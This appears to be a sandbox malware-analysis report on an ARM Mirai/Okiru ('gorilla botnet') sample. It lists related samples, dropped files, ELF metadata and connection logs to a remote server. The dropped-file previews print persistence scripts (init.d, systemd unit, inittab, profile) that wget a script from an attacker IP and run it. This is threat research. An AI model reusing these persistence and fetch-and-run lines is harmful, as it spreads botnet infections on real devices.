	mips.nn.elf	Get hash	malicious	Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Okiru	Browse
	arm.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	arm7.nn.elf	Get hash	malicious	Mirai, Okiru	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
daisy.ubuntu.com	x86_64.nn.elf	Get hash	malicious	Okiru	Browse	162.213.35.25
	m68k.nn.elf	Get hash	malicious	Okiru	Browse	162.213.35.24
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	162.213.35.25
	splarm6.elf	Get hash	malicious	Unknown	Browse	162.213.35.25
	jklarm6.elf	Get hash	malicious	Unknown	Browse	162.213.35.24
	arm.nn-20241224-0050.elf	Get hash	malicious	Okiru	Browse	162.213.35.24
	arm6.nn-20241224-0050.elf	Get hash	malicious	Okiru	Browse	162.213.35.25
	m68k.nn.elf	Get hash	malicious	Okiru	Browse	162.213.35.25
	sh4.nn.elf	Get hash	malicious	Okiru	Browse	162.213.35.25
	arm7.elf	Get hash	malicious	Mirai	Browse	162.213.35.25

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NETIXBG	mips.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	arm5.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	sh4.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	mips.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	sh4.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	arm.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	arm7.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	94.156.227.234

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/etc/rc.local	mips.nn.elf	Get hash	malicious	Okiru	Browse
	m68k.nn.elf	Get hash	malicious	Okiru	Browse
	arm5.nn.elf	Get hash	malicious	Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Okiru	Browse
	mips.nn.elf	Get hash	malicious	Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Okiru	Browse
	arm.nn.elf	Get hash	malicious	Okiru	Browse
	m68k.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse

Created / dropped Files

/boot/bootcmd

Download File

Process:	/tmp/arm.nn-20241224-0652.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	133
Entropy (8bit):	4.776271686788884
Encrypted:	false
SSDEEP:	3:KPJRX7/IoXBOQX25DoCvLdjX48FIbILbaaFOdFXa5O:WJRkKBf2doYZX48bbaaeXCO
MD5:	B3E0DCB51006D28BC90889DB2D53F04C
SHA1:	B5E27584CCF32FDC8D45BAC48E0477C6BDB1BB5F
SHA-256:	0A1E5876A9B6E813ECBF84FB92205CDA7D37C17C2D19AAC6B2D1039405EC7744
SHA-512:	C48D3A4923385CF33553DD393FB61B4B10C17F55E5008CE8DD9C3083008716605CAA851232F69351F955C693CDEFB8AB8A93A1DC26C71F2F4BD3436AE3A5E688
Malicious:	false
Reputation:	low
Preview:	run bootcmd_mmc0; /tmp/arm.nn-20241224-0652.elf && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/init.d/arm.nn-20241224-0652.elf

Download File

Process:	/bin/sh
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	465
Entropy (8bit):	4.748853059564771
Encrypted:	false
SSDEEP:	12:QRkuOyNxnl84PUJgjvMX2lEFhDKN+dRRucSOyd3:qhcIyvDYOM3
MD5:	DABF77B0C4B1164649693D364EAB1EE4
SHA1:	3459715CAA100D57656C042C5CBF7EBC52F2AA9F
SHA-256:	3318715BEB1E8EEA90F0B7BB4DB249057D04ABF216DB93A42238BD367385E181
SHA-512:	5FB78B00D7553AC25BC9D395613F729545E02859E530036BAAF93BDE8E975E90AC15B8A503CF5EF5F34A9874E0698FFDED04ED498A8DC69482F0DA8F57AA53F8
Malicious:	true
Reputation:	low
Preview:	#!/bin/sh.# /etc/init.d/arm.nn-20241224-0652.elf..case "" in. start). echo 'Starting arm.nn-20241224-0652.elf'. /tmp/arm.nn-20241224-0652.elf &. wget http://94.156.227.233/ -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping arm.nn-20241224-0652.elf'. killall arm.nn-20241224-0652.elf. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start\|stop\|restart}". exit 1. ;;.esac.exit 0.

/etc/init.d/system

Download File

Process:	/tmp/arm.nn-20241224-0652.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	120
Entropy (8bit):	4.79386006924967
Encrypted:	false
SSDEEP:	3:TKH4vZK7/IoXBOQX25vSDRFiLdjX48FIbILpaKB0dFLoKE0:h8kKBf2xSXoZX48bzBeLXE0
MD5:	9C853DA593B22A18F26692E3C35A56F1
SHA1:	55EC86E2094227CDC2EDBAEF417F5C5C5B7C59D1
SHA-256:	0302AC04D269D7ED269990EECA0E1D72B647A97BE910F600D3A74A9DA3D87D13
SHA-512:	0E807D7F8E0A497B50593A011E1FA2567A1780470CC38216F279E9258DD431648A15E25C357238784B1B5B1477D9A913F844E892071C557FFFC6F5137BE0685A
Malicious:	true
Reputation:	low
Preview:	#!/bin/sh./tmp/arm.nn-20241224-0652.elf &.wget http://94.156.227.233/ -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.

/etc/inittab

Download File

Process:	/tmp/arm.nn-20241224-0652.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	125
Entropy (8bit):	4.721232444542901
Encrypted:	false
SSDEEP:	3:nAWu5d/IoXBOQX25DoCvLdjX48FIbILbaaFOdFXa5O:AcKBf2doYZX48bbaaeXCO
MD5:	5DCE699FAF96039F9988087DFFA1C1CF
SHA1:	599D873AEF49EC126419F566AD8B0395456DCC9F
SHA-256:	8A9923193375D3953E139430D2770AF07B8FD00C27812B9D77901202320A72A2
SHA-512:	88756E26C307ED3523684198D18D344FA1C497B233E563E04A0E65A7C51100496A3A19A383689A09A62BA930509891529968764A5707862C9D5F161C595B1C02
Malicious:	false
Reputation:	low
Preview:	::respawn:/tmp/arm.nn-20241224-0652.elf && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/motd

Download File

Process:	/tmp/arm.nn-20241224-0652.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	53
Entropy (8bit):	3.871459242626451
Encrypted:	false
SSDEEP:	3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
MD5:	2BD9B4BE30579E633FC0191AA93DF486
SHA1:	7D63A9BD9662E86666B27C1B50DB8E7370C624FF
SHA-256:	64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
SHA-512:	AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	gorilla botnet is on the device ur not a cat go away.

/etc/profile

Download File

Process:	/tmp/arm.nn-20241224-0652.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	116
Entropy (8bit):	4.651826184930634
Encrypted:	false
SSDEEP:	3:Tg7/IoXBOQX25vSDRFiLdjX48FIbILbaaFOdFXa50:TgkKBf2xSXoZX48bbaaeXC0
MD5:	0D503DFC1151270083024F56F73B4D33
SHA1:	5BADC76260510D52175B0CA7237153FDDB894C4F
SHA-256:	5131A888989023E481D65D4E07ABEF05906D70CEC3DE461A788197E02501F52F
SHA-512:	E7555BE20B569F82F802A419DB1C9022C4862CDE160DEC1CB31CCFF4DDB2A6E83ED773394BDB0EE4E415DC004529A699187C9DE89419435194C5659BF1B9AC8C
Malicious:	true
Reputation:	low
Preview:	/tmp/arm.nn-20241224-0652.elf &.wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.

/etc/rc.local

Download File

Process:	/tmp/arm.nn-20241224-0652.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	10
Entropy (8bit):	3.121928094887362
Encrypted:	false
SSDEEP:	3:TKH4vn:hv
MD5:	3E2B31C72181B87149FF995E7202C0E3
SHA1:	BD971BEC88149956458A10FC9C5ECB3EB99DD452
SHA-256:	A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
SHA-512:	543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: mips.nn.elf, Detection: malicious, Browse Filename: m68k.nn.elf, Detection: malicious, Browse Filename: arm5.nn.elf, Detection: malicious, Browse Filename: sh4.nn.elf, Detection: malicious, Browse Filename: mips.nn.elf, Detection: malicious, Browse Filename: x86_64.nn.elf, Detection: malicious, Browse Filename: sh4.nn.elf, Detection: malicious, Browse Filename: arm.nn.elf, Detection: malicious, Browse Filename: m68k.nn.elf, Detection: malicious, Browse Filename: x86_32.nn.elf, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	#!/bin/sh.

/etc/systemd/system/custom.service

Download File

Process:	/tmp/arm.nn-20241224-0652.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	314
Entropy (8bit):	5.1355758756707
Encrypted:	false
SSDEEP:	6:z8ifitRZAMzdK+gKBf2s2+GWRdbZX48B+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+FI+GWRdtd+GWRXY+GWRuL6
MD5:	7A5756A46FF4A846078BF23AC6235A18
SHA1:	209E171D65D23F11EDD4C4C34A6A70FA4D50CF46
SHA-256:	25522594FB6C6B4314F95485DF85EEB4AF6120E3C67D0543B48CF6E6B632016C
SHA-512:	C407DC13CACB507955EC22DFAFCFC50DD28AC3F5F31F72BB040D859B96D4642D5530615F340B60022ACD174FE626FFE8F413C24C12097FD02BD14CDE07C83121
Malicious:	false
Preview:	[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/tmp/arm.nn-20241224-0652.elf.ExecStartPost=/usr/bin/wget -O /tmp/lol.sh http://94.156.227.233/.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/tmp/qemu-open.GmV2rd (deleted)

Download File

Process:	/tmp/arm.nn-20241224-0652.elf
File Type:	data
Category:	dropped
Size (bytes):	30
Entropy (8bit):	4.053235913127291
Encrypted:	false
SSDEEP:	3:Tg7/IoXBOQX2l:TgkKBf2l
MD5:	5E84841E140EAEFA29602CB374566B21
SHA1:	8B0BA64FD43312ADF9120DBFDB2E6FAFB245BE7B
SHA-256:	E1E6DAF14127674CFFCE88B87591507345EA6EB652129C423848A1BAD32F1C90
SHA-512:	B3A82AB2637B66BA8177741165D46ECA5208B671619FF429E7952617BFDD13374510CBC2B4458A3A7E63462426B4AA3AD66CCA0AAA932194BA976EBB532AE3C8
Malicious:	false
Preview:	/tmp/arm.nn-20241224-0652.elf.

Static File Info

General

File type:	ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
Entropy (8bit):	6.182056662137921
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	arm.nn-20241224-0652.elf
File size:	91'808 bytes
MD5:	03ead7aeb51e3e00a6bd3a4a522f8aad
SHA1:	bb9612690457e0a31bd0e56187b06c1eac629d9c
SHA256:	1636d1bf8a651852f8a808137b2648529c297115039ed4f4f4f85e7d0494710c
SHA512:	2f8962ba38aaada973bbd14acb71c12f255ccb6544f702b179bcec34fcab6502e7844323b19defe1b1b4de1aced1b19024cec9ab86d48110102586400966ff6d
SSDEEP:	1536:UZPtGOlFvtMhh3POBnVepv6YjnTQ+kfl0ywo2kY0vrPfo:UZPtGOl2PeepjPpkfl0LCbfo
TLSH:	FC932951B8819623C6D523BBF67E028D3B2613B8D2EF7217CD25AF21738692B0D77641
File Content Preview:	.ELF...a..........(.........4....e......4. ...(.....................$_..$_...............`...`...`.......&..........Q.td..................................-...L."...1N..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	ARM
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	ARM - ABI
ABI Version:	0
Entry Point Address:	0x8190
Flags:	0x202
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	91408
Section Header Size:	40
Number of Section Headers:	10
Header String Table Index:	9

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x8094	0x94	0x18	0x0	0x6	AX	4
.text	PROGBITS	0x80b0	0xb0	0x138fc	0x0	0x6	AX	16
.fini	PROGBITS	0x1b9ac	0x139ac	0x14	0x0	0x6	AX	4
.rodata	PROGBITS	0x1b9c0	0x139c0	0x2564	0x0	0x2	A	4
.ctors	PROGBITS	0x26000	0x16000	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x26008	0x16008	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x26014	0x16014	0x4bc	0x0	0x3	WA	4
.bss	NOBITS	0x264d0	0x164d0	0x2214	0x0	0x3	WA	4
.shstrtab	STRTAB	0x0	0x164d0	0x3e	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x8000	0x8000	0x15f24	0x15f24	6.2027	0x5	R E	0x8000	.init .text .fini .rodata
LOAD	0x16000	0x26000	0x26000	0x4d0	0x26e4	4.6324	0x6	RW	0x8000	.ctors .dtors .data .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 07:53:56.830614090 CET	44548	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:53:56.950387955 CET	38242	44548	94.156.227.234	192.168.2.13
Dec 24, 2024 07:53:56.950524092 CET	44548	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:53:56.950953960 CET	44548	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:53:57.070453882 CET	38242	44548	94.156.227.234	192.168.2.13
Dec 24, 2024 07:53:57.634417057 CET	44548	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:53:57.796437025 CET	38242	44548	94.156.227.234	192.168.2.13
Dec 24, 2024 07:53:58.087634087 CET	38242	44548	94.156.227.234	192.168.2.13
Dec 24, 2024 07:53:58.087702990 CET	44548	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:53:58.639827967 CET	44550	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:53:58.759654999 CET	38242	44550	94.156.227.234	192.168.2.13
Dec 24, 2024 07:53:58.759749889 CET	44550	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:53:58.759749889 CET	44550	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:53:58.879446983 CET	38242	44550	94.156.227.234	192.168.2.13
Dec 24, 2024 07:53:59.273190975 CET	44550	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:53:59.436425924 CET	38242	44550	94.156.227.234	192.168.2.13
Dec 24, 2024 07:53:59.875389099 CET	38242	44550	94.156.227.234	192.168.2.13
Dec 24, 2024 07:53:59.875447035 CET	44550	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:00.276010990 CET	44552	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:00.396528006 CET	38242	44552	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:00.396603107 CET	44552	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:00.396632910 CET	44552	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:00.517008066 CET	38242	44552	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:00.982166052 CET	44552	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:01.144771099 CET	38242	44552	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:01.527067900 CET	38242	44552	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:01.527147055 CET	44552	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:01.984755039 CET	44554	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:02.104536057 CET	38242	44554	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:02.104615927 CET	44554	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:02.104732037 CET	44554	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:02.224349022 CET	38242	44554	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:02.610150099 CET	44554	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:02.772620916 CET	38242	44554	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:03.227834940 CET	38242	44554	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:03.227969885 CET	44554	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:03.611710072 CET	44556	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:03.731427908 CET	38242	44556	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:03.731544971 CET	44556	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:03.731544971 CET	44556	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:03.851406097 CET	38242	44556	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:04.237237930 CET	44556	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:04.400509119 CET	38242	44556	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:04.869692087 CET	38242	44556	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:04.869777918 CET	44556	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:05.238765955 CET	44558	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:05.358562946 CET	38242	44558	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:05.358670950 CET	44558	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:05.358670950 CET	44558	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:05.478574991 CET	38242	44558	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:05.862179041 CET	44558	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:06.024574995 CET	38242	44558	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:06.485621929 CET	38242	44558	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:06.485702991 CET	44558	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:06.863188982 CET	44560	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:06.982846975 CET	38242	44560	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:06.982923985 CET	44560	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:06.982966900 CET	44560	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:07.102813959 CET	38242	44560	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:07.487145901 CET	44560	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:07.648530006 CET	38242	44560	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:08.109178066 CET	38242	44560	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:08.109297037 CET	44560	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:08.488126993 CET	44562	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:08.607861042 CET	38242	44562	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:08.607933044 CET	44562	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:08.607985973 CET	44562	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:08.729324102 CET	38242	44562	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:09.110858917 CET	44562	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:09.272433996 CET	38242	44562	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:09.734466076 CET	38242	44562	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:09.734688997 CET	44562	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:10.111948967 CET	44564	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:10.232002020 CET	38242	44564	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:10.232075930 CET	44564	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:10.232108116 CET	44564	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:10.352057934 CET	38242	44564	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:10.735346079 CET	44564	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:10.896553993 CET	38242	44564	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:11.348408937 CET	38242	44564	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:11.348494053 CET	44564	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:11.736394882 CET	44566	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:11.856163979 CET	38242	44566	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:11.856230974 CET	44566	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:11.856247902 CET	44566	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:11.975934982 CET	38242	44566	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:12.360421896 CET	44566	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:12.524563074 CET	38242	44566	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:12.990797043 CET	38242	44566	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:12.990853071 CET	44566	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:13.361565113 CET	44568	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:13.481367111 CET	38242	44568	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:13.481461048 CET	44568	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:13.481513977 CET	44568	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:13.601375103 CET	38242	44568	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:13.984770060 CET	44568	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:14.148540974 CET	38242	44568	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:14.601641893 CET	38242	44568	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:14.601721048 CET	44568	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:14.985702038 CET	44570	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:15.105624914 CET	38242	44570	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:15.105720043 CET	44570	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:15.105720043 CET	44570	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:15.225435972 CET	38242	44570	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:15.610454082 CET	44570	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:15.772490025 CET	38242	44570	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:16.229902983 CET	38242	44570	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:16.229996920 CET	44570	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:16.611418009 CET	44572	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:16.731148958 CET	38242	44572	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:16.731206894 CET	44572	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:16.731235981 CET	44572	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:16.850955009 CET	38242	44572	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:17.235259056 CET	44572	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:17.396569014 CET	38242	44572	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:17.848023891 CET	38242	44572	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:17.848237038 CET	44572	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:18.236252069 CET	44574	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:18.356097937 CET	38242	44574	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:18.356204033 CET	44574	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:18.356276035 CET	44574	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:18.476140976 CET	38242	44574	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:18.860440016 CET	44574	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:19.020581961 CET	38242	44574	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:19.481297970 CET	38242	44574	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:19.481380939 CET	44574	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:19.861527920 CET	44576	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:19.981173038 CET	38242	44576	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:19.981256008 CET	44576	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:19.981309891 CET	44576	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:20.101233006 CET	38242	44576	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:20.485593081 CET	44576	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:20.652517080 CET	38242	44576	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:21.100225925 CET	38242	44576	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:21.100372076 CET	44576	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:21.487215042 CET	44578	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:21.607101917 CET	38242	44578	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:21.607192039 CET	44578	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:21.607265949 CET	44578	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:21.727283955 CET	38242	44578	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:22.111291885 CET	44578	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:22.276545048 CET	38242	44578	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:22.740906000 CET	38242	44578	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:22.741152048 CET	44578	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:23.112252951 CET	44580	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:23.232141018 CET	38242	44580	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:23.232220888 CET	44580	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:23.232388020 CET	44580	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:23.351970911 CET	38242	44580	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:23.736924887 CET	44580	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:23.904789925 CET	38242	44580	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:24.355928898 CET	38242	44580	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:24.355993986 CET	44580	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:24.737768888 CET	44582	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:24.857481003 CET	38242	44582	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:24.857673883 CET	44582	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:24.857858896 CET	44582	38242	192.168.2.13	94.156.227.234
